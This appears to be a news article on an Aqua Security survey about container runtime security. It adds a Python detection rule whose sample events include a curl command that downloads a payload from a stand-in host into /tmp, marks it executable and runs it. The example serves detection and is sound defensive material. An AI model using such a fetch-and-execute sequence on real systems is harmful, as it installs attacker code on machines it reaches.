The default security capabilities of containers are being overestimated by those working with them. In a survey conducted by Aqua Security, only three percent of respondents recognized that a container by itself is not a security boundary.

“The results of the survey showcase a staggering knowledge gap that leads to an underinvestment in a critical part of full lifecycle, end-to-end security for cloud native applications,” said Amir Jerbi, cofounder and CTO at Aqua. “When practitioners fail to implement a holistic approach with protecting their workloads at runtime, they are opening up their environments to attackers, since even the most complete ‘shift left’ vulnerability and malware detection cannot prevent zero-day attacks and administrator errors.” 

In addition, only 24% of respondents stated that they had plans to set up the building blocks that are needed for proper runtime security. 

The survey also revealed a knowledge gap around workload protection. Seventy-three percent of respondents thought they could stop supply chain attacks that make it past static analysis tools, but according to Aqua Security this reflects a misconception about the role runtime security plays in stopping them.

“There is a concerning overconfidence in the perceived ability to prevent supply chain attacks. The reality is that runtime security is essential because sophisticated supply chain attacks evade static analysis. We see unnamed attackers use legitimate vanilla images to download malicious elements at runtime, Kinsing malware that only downloads in runtime, and attackers like Team TNT who hide their malicious communications attacking our honeypots on a daily basis,” said Jerbi.
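The pattern Jerbi describes, a clean image that only fetches its payload once it is running, is invisible to an image scanner and only shows up in runtime telemetry. The following is an added illustration, not code from Aqua Security or from the article, of the kind of rule a runtime monitor applies: it replays a stream of per-container process-exec events (constructed sample data, not real telemetry) and flags a container that downloads a file into a scratch directory and then executes it. The event schema, the container names and the paths are assumptions made for the example.

```python
# Added example: toy runtime rule for "download, then execute" inside a container.
# Static image scanning sees only the image layers; this rule reasons over what
# processes actually did after the container started.
from dataclasses import dataclass
from typing import List, Tuple

DOWNLOADERS = {"curl", "wget"}                       # tools commonly used to fetch a payload
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")  # writable dirs a clean image rarely execs from


@dataclass
class ExecEvent:
    """One process-exec observed by the runtime sensor (hypothetical schema)."""
    ts: float            # seconds since container start
    container: str       # container id or name
    comm: str            # program name of the new process
    args: List[str]      # argv, args[0] is the executed path


def _download_target(args: List[str]):
    """Return the local output path of a curl -o / wget -O invocation, else None."""
    for i, a in enumerate(args):
        if a in ("-o", "-O") and i + 1 < len(args):
            return args[i + 1]
    return None


def detect_runtime_payloads(events: List[ExecEvent]) -> List[Tuple[str, str, str]]:
    """Return (severity, container, path) findings.

    high   : a file was downloaded into a scratch dir and later executed in the same container
    medium : something was executed from a scratch dir with no download seen (e.g. dropped via
             another channel); still worth a look because clean images rarely do this
    """
    downloaded = {}   # (container, path) -> ts of the download
    findings = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.comm in DOWNLOADERS:
            target = _download_target(ev.args)
            if target and target.startswith(SCRATCH_DIRS):
                downloaded[(ev.container, target)] = ev.ts
            continue
        exe = ev.args[0] if ev.args else ev.comm
        key = (ev.container, exe)
        if key in downloaded and ev.ts >= downloaded[key]:
            findings.append(("high", ev.container, exe))
        elif exe.startswith(SCRATCH_DIRS):
            findings.append(("medium", ev.container, exe))
    return findings


# Constructed sample stream: a "vanilla" image that pulls its payload after start-up,
# a benign web service, and a container running an unexplained binary from /var/tmp.
SAMPLE_EVENTS = [
    ExecEvent(1.0, "web-7f3", "sh", ["sh", "-c", "start.sh"]),
    ExecEvent(2.0, "web-7f3", "curl", ["curl", "-fsSL", "http://payload.example.invalid/x", "-o", "/tmp/.x"]),
    ExecEvent(3.0, "web-7f3", "chmod", ["chmod", "+x", "/tmp/.x"]),
    ExecEvent(4.0, "web-7f3", ".x", ["/tmp/.x"]),
    ExecEvent(5.0, "api-2c1", "node", ["/usr/bin/node", "server.js"]),
    ExecEvent(6.0, "job-9a0", "helper", ["/var/tmp/helper", "--run"]),
]

if __name__ == "__main__":
    for severity, container, path in detect_runtime_payloads(SAMPLE_EVENTS):
        print(f"[{severity}] {container}: executed {path}")
```

A real sensor would read these events from the kernel (eBPF, auditd or a container runtime hook) rather than a list, and would add context such as the image digest and the parent process tree; the point here is only that the signal exists at runtime and nowhere in the image.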

The number of attacks overall has increased, signalling the need for greater security. In a six-month period Aqua Security observed over 17,000 honeypots that were attacked, which was an increase of 26% from the previous six months. 

Aqua Security surveyed over 150 cloud native security professionals across a number of sectors for the report.